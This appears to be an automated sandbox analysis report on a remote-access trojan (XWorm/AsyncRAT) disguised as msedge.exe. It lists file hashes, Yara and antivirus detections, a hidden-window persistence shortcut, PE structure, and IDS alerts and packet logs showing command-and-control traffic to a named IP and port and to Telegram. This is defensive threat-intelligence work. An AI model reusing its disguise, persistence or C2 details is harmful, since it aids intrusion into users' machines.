                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Users\user\Desktop\msedge.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):170496
                                          Entropy (8bit):6.245341266540151
                                          Encrypted:false
                                          SSDEEP:3072:TvRAbFv9Y3OwrRUGKXs+S++7KFSbxeY+qDDrMm:mpv9ZGqStKEbxI
                                          MD5:AEE20D80F94AE0885BB2CABADB78EFC9
                                          SHA1:1E82EBA032FCB0B89E1FDF937A79133A5057D0A1
                                          SHA-256:498EB55B3FB4C4859EE763A721870BB60ECD57E99F66023B69D8A258EFA3AF7D
                                          SHA-512:3A05FF32B9AA79092578C09DFE67EACA23C6FE8383111DAB05117F39D91F27670029F39482827D191BD6A652483202B8FC1813F8D5A0F3F73FD35CA37A4F6D42
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\msedge.exe, Author: Joe Security
                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\msedge.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\msedge.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 71%
                                           • Antivirus: Virustotal, Detection: 66%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&.f................................. ........@.. ....................................@.................................H...S.......L............................................................................ ............... ..H............text........ ...................... ..`.rsrc...L...........................@..@.reloc..............................@..B........................H.......,]...Z............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                          Process:C:\Users\user\Desktop\msedge.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Aug 3 17:11:05 2024, mtime=Sat Aug 3 17:11:05 2024, atime=Sat Aug 3 17:11:05 2024, length=170496, window=hide
                                          Category:dropped
                                          Size (bytes):957
                                          Entropy (8bit):5.056471639892614
                                          Encrypted:false
                                          SSDEEP:24:8VXQDrlXoXmR0xSAsFGa42CL7Sr7/qygm:8VXQDrlY2R0xxsZNCLg7iyg
                                          MD5:FDECC7E05FB9D709B6DF362E8721BD5C
                                          SHA1:2A904DEB10A5B1AC9808D4A684B6FEA5EBEF3993
                                          SHA-256:CD29EF03BCA120E3D35D5B438DE82D46C520CE9F19FEB9F369335B61232B3E00
                                          SHA-512:D0A8DFCA6837E3F904350FF2B30AE95B8AE1AF21EDF8A174A8A8C927267A5CDFEF064C775F5BC8342F428C56FB593DC424FF9CFAD774DA17F686CF030241F013
                                          Malicious:false
                                          Preview:L..................F.... ...................................................n.:..DG..Yr?.D..U..k0.&...&.......$..S....!.Y....../.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.YB............................^.A.p.p.D.a.t.a...B.P.1......Y=...Local.<......EW<2.YB.....[.....................W...L.o.c.a.l.....`.2......Yc. .msedge.exe..F.......Yc..Yc...............................m.s.e.d.g.e...e.x.e.......Y...............-.......X....................C:\Users\user\AppData\Local\msedge.exe..".....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.m.s.e.d.g.e...e.x.e.............:...........|....I.J.H..K..:...`.......X.......048707...........hT..CrF.f4... ...1..Q...-...-$..hT..CrF.f4... ...1..Q...-...-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):6.245341266540151
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:msedge.exe
                                          File size:170'496 bytes
                                          MD5:aee20d80f94ae0885bb2cabadb78efc9
                                          SHA1:1e82eba032fcb0b89e1fdf937a79133a5057d0a1
                                          SHA256:498eb55b3fb4c4859ee763a721870bb60ecd57e99f66023b69d8a258efa3af7d
                                          SHA512:3a05ff32b9aa79092578c09dfe67eaca23c6fe8383111dab05117f39d91f27670029f39482827d191bd6a652483202b8fc1813f8d5a0f3f73fd35ca37a4f6d42
                                          SSDEEP:3072:TvRAbFv9Y3OwrRUGKXs+S++7KFSbxeY+qDDrMm:mpv9ZGqStKEbxI
                                          TLSH:18F36D1D6F8AB49BD42C0EB558B7E6D1073CEF56E4E252DC24E8AE3DB792474C600B90
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&..f................................. ........@.. ....................................@................................
                                          Icon Hash:170105b232472f1f
                                          Entrypoint:0x40b79e
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x66ABCE26 [Thu Aug 1 18:04:22 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                           Name | Virtual Address | Virtual Size | Is in Section
                                           IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb748 | 0x53 | .text
                                           IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x1fd4c | .rsrc
                                           IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2c000 | 0xc | .reloc
                                           IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                           IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                           IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                           Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                           .text | 0x2000 | 0x97a4 | 0x9800 | 732655275a32c9952a61d07286066fc0 | False | 0.49267578125 | data | 5.704586945016344 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                           .rsrc | 0xc000 | 0x1fd4c | 0x1fe00 | 5eb416130ef4c1469c341a79af26007e | False | 0.435922181372549 | data | 6.182646419868073 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                           .reloc | 0x2c000 | 0xc | 0x200 | aa61d73a2c7a2a4507d7faf8eed902af | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                           Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                           RT_ICON | 0xc220 | 0x7198 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9990027510316368
                                           RT_ICON | 0x133b8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | | | 0.21535253756062936
                                           RT_ICON | 0x23be0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | | | 0.3363249881908361
                                           RT_ICON | 0x27e08 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | | | 0.4050829875518672
                                           RT_ICON | 0x2a3b0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.5145403377110694
                                           RT_ICON | 0x2b458 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | | | 0.7411347517730497
                                           RT_GROUP_ICON | 0x2b8c0 | 0x5a | data | | | 0.7333333333333333
                                           RT_VERSION | 0x2b91c | 0x244 | data | | | 0.4706896551724138
                                           RT_MANIFEST | 0x2bb60 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
                                           DLL | Import
                                           mscoree.dll | _CorExeMain
                                           Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                                           2024-08-03T20:11:28.691332+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           2024-08-03T20:11:38.074505+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49722 | 7000 | 192.168.2.6 | 213.219.149.161
                                           2024-08-03T20:11:38.696832+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           2024-08-03T20:11:52.511794+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49722 | 7000 | 192.168.2.6 | 213.219.149.161
                                           2024-08-03T20:11:55.631124+0200 | TCP | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           2024-08-03T20:12:06.948813+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           2024-08-03T20:11:43.679696+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           2024-08-03T20:11:18.800314+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           2024-08-03T20:11:23.649351+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49722 | 7000 | 192.168.2.6 | 213.219.149.161
                                           2024-08-03T20:11:13.677035+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           2024-08-03T20:11:53.694351+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           2024-08-03T20:11:23.793667+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           2024-08-03T20:12:03.700019+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           2024-08-03T20:12:13.700722+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           2024-08-03T20:11:48.683210+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           2024-08-03T20:11:58.696172+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           2024-08-03T20:12:12.990412+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           2024-08-03T20:11:38.072914+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           2024-08-03T20:11:08.809199+0200 | TCP | 2853685 | ETPRO MALWARE Win32/XWorm Checkin via Telegram | 49721 | 443 | 192.168.2.6 | 149.154.167.220
                                           2024-08-03T20:12:06.950681+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49722 | 7000 | 192.168.2.6 | 213.219.149.161
                                           2024-08-03T20:11:25.636313+0200 | TCP | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           2024-08-03T20:11:52.509901+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           2024-08-03T20:12:12.991173+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49722 | 7000 | 192.168.2.6 | 213.219.149.161
                                           2024-08-03T20:11:23.448430+0200 | TCP | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 49722 | 7000 | 192.168.2.6 | 213.219.149.161
                                           2024-08-03T20:11:33.687117+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           2024-08-03T20:12:08.705779+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           2024-08-03T20:11:23.647357+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                           Aug 3, 2024 20:11:06.920258045 CEST | 49720 | 443 | 192.168.2.6 | 104.20.3.235
                                           Aug 3, 2024 20:11:06.920298100 CEST | 443 | 49720 | 104.20.3.235 | 192.168.2.6
                                           Aug 3, 2024 20:11:06.920455933 CEST | 49720 | 443 | 192.168.2.6 | 104.20.3.235
                                           Aug 3, 2024 20:11:06.930641890 CEST | 49720 | 443 | 192.168.2.6 | 104.20.3.235
                                           Aug 3, 2024 20:11:06.930669069 CEST | 443 | 49720 | 104.20.3.235 | 192.168.2.6
                                           Aug 3, 2024 20:11:07.397459030 CEST | 443 | 49720 | 104.20.3.235 | 192.168.2.6
                                           Aug 3, 2024 20:11:07.397730112 CEST | 49720 | 443 | 192.168.2.6 | 104.20.3.235
                                           Aug 3, 2024 20:11:07.400084972 CEST | 49720 | 443 | 192.168.2.6 | 104.20.3.235
                                           Aug 3, 2024 20:11:07.400101900 CEST | 443 | 49720 | 104.20.3.235 | 192.168.2.6
                                           Aug 3, 2024 20:11:07.400515079 CEST | 443 | 49720 | 104.20.3.235 | 192.168.2.6
                                           Aug 3, 2024 20:11:07.445070982 CEST | 49720 | 443 | 192.168.2.6 | 104.20.3.235
                                           Aug 3, 2024 20:11:07.484543085 CEST | 49720 | 443 | 192.168.2.6 | 104.20.3.235
                                           Aug 3, 2024 20:11:07.532494068 CEST | 443 | 49720 | 104.20.3.235 | 192.168.2.6
                                           Aug 3, 2024 20:11:07.591120005 CEST | 443 | 49720 | 104.20.3.235 | 192.168.2.6
                                           Aug 3, 2024 20:11:07.591219902 CEST | 443 | 49720 | 104.20.3.235 | 192.168.2.6
                                           Aug 3, 2024 20:11:07.591334105 CEST | 49720 | 443 | 192.168.2.6 | 104.20.3.235
                                           Aug 3, 2024 20:11:07.631206036 CEST | 49720 | 443 | 192.168.2.6 | 104.20.3.235
                                           Aug 3, 2024 20:11:07.874955893 CEST | 49721 | 443 | 192.168.2.6 | 149.154.167.220
                                           Aug 3, 2024 20:11:07.875068903 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.6
                                           Aug 3, 2024 20:11:07.875158072 CEST | 49721 | 443 | 192.168.2.6 | 149.154.167.220
                                           Aug 3, 2024 20:11:07.875574112 CEST | 49721 | 443 | 192.168.2.6 | 149.154.167.220
                                           Aug 3, 2024 20:11:07.875623941 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.6
                                           Aug 3, 2024 20:11:08.515733004 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.6
                                           Aug 3, 2024 20:11:08.515887976 CEST | 49721 | 443 | 192.168.2.6 | 149.154.167.220
                                           Aug 3, 2024 20:11:08.585150003 CEST | 49721 | 443 | 192.168.2.6 | 149.154.167.220
                                           Aug 3, 2024 20:11:08.585226059 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.6
                                           Aug 3, 2024 20:11:08.585731983 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.6
                                           Aug 3, 2024 20:11:08.590853930 CEST | 49721 | 443 | 192.168.2.6 | 149.154.167.220
                                           Aug 3, 2024 20:11:08.636508942 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.6
                                           Aug 3, 2024 20:11:08.809226036 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.6
                                           Aug 3, 2024 20:11:08.809312105 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.6
                                           Aug 3, 2024 20:11:08.809551001 CEST | 49721 | 443 | 192.168.2.6 | 149.154.167.220
                                           Aug 3, 2024 20:11:08.831983089 CEST | 49721 | 443 | 192.168.2.6 | 149.154.167.220
                                           Aug 3, 2024 20:11:08.967080116 CEST | 49722 | 7000 | 192.168.2.6 | 213.219.149.161
                                           Aug 3, 2024 20:11:08.972042084 CEST | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           Aug 3, 2024 20:11:08.972160101 CEST | 49722 | 7000 | 192.168.2.6 | 213.219.149.161
                                           Aug 3, 2024 20:11:09.020905018 CEST | 49722 | 7000 | 192.168.2.6 | 213.219.149.161
                                           Aug 3, 2024 20:11:09.025886059 CEST | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           Aug 3, 2024 20:11:13.677035093 CEST | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           Aug 3, 2024 20:11:13.726344109 CEST | 49722 | 7000 | 192.168.2.6 | 213.219.149.161
                                           Aug 3, 2024 20:11:14.144012928 CEST | 49722 | 7000 | 192.168.2.6 | 213.219.149.161
                                           Aug 3, 2024 20:11:14.148987055 CEST | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           Aug 3, 2024 20:11:14.149000883 CEST | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                           Aug 3, 2024 20:11:14.149008989 CEST | 7000 | 49722 | 213.219.149.161 | 192.168.2.6
                                          Aug 3, 2024 20:11:14.149044991 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:14.149116993 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:14.149126053 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:14.149137020 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:18.800313950 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:18.851311922 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:18.859127045 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:18.864211082 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:18.864229918 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:18.864242077 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:18.864463091 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:18.864475965 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:18.864506006 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:18.864518881 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:23.448430061 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:23.453468084 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:23.647356987 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:23.649350882 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:23.660665989 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:23.793667078 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:23.828157902 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:23.833189011 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:23.833220005 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:23.833233118 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:23.833292961 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:23.833370924 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:23.833388090 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:23.833435059 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:25.636312962 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:25.679449081 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:28.691332102 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:28.742058992 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:28.751878023 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:28.756839037 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:28.756870985 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:28.756901026 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:28.757138968 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:28.757168055 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:28.757194996 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:28.757226944 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:33.687117100 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:33.721369028 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:33.726372004 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:33.726387978 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:33.726409912 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:33.726418972 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:33.726428032 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:33.726466894 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:33.726475954 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:33.726484060 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:37.883467913 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:37.889391899 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:38.072913885 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:38.074505091 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:38.079310894 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:38.696831942 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:38.733496904 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:38.738575935 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:38.738595963 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:38.738621950 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:38.738635063 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:38.738647938 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:38.738785982 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:38.738799095 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:38.738811016 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:43.679696083 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:43.717814922 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:43.722867012 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:43.722928047 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:43.722955942 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:43.723054886 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:43.723104954 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:43.723149061 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:43.723176003 CEST700049722213.219.149.161192.168.2.6
